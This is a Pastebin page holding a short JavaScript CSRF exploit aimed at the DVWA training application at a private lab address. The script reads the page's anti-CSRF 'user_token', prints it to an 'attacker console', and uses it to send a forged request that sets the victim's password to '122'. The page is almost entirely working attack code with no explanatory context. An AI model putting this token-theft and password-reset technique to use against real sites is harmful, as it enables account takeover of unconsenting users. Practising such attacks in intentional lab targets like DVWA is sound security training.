Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var xhr = new XMLHttpRequest();
- xhr.onreadystatechange = function () {
- if (xhr.readyState == 4) {
- response=readBody(xhr);
- //console.log(response);
- }
- }
- xhr.open('GET', 'http://192.168.111.138/dvwa/vulnerabilities/csrf/', true);
- xhr.send(null);
- function readBody(xhr) {
- var data;
- //responsetype type of response
- //txt: The response is text in a DOMString object.
- //document: he response is an HTML Document or XML XMLDocument,
- if (!xhr.responseType || xhr.responseType === "text") {
- data = xhr.responseText;
- } else if (xhr.responseType === "document") {
- data = xhr.responseXML;
- } else {
- data = xhr.response;
- }
- //Domparser: interface provides the ability to parse XML or HTML source code from a string into a DOM Document.
- var parser = new DOMParser();
- //you can parse now
- var resp=parser.parseFromString(data, "text/html");
- user_token = resp.getElementsByName('user_token')[0].value; //grab first available user_token
- //show user_token in attacker consol
- console.log('user_token: ' + user_token);
- csrf(user_token);
- return data;
- }
- function csrf(user_token) {
- var x1 = new XMLHttpRequest();
- x1.open('GET','http://192.168.111.138/dvwa/vulnerabilities/csrf/?password_new=122&password_conf=122&Change=Change&user_token='+user_token,true);
- x1.setRequestHeader("Content-Type", "application/json; charset=utf-8");
- x1.send(null);
- alert('csrf attack success');
- }
Add Comment
Please, Sign In to add comment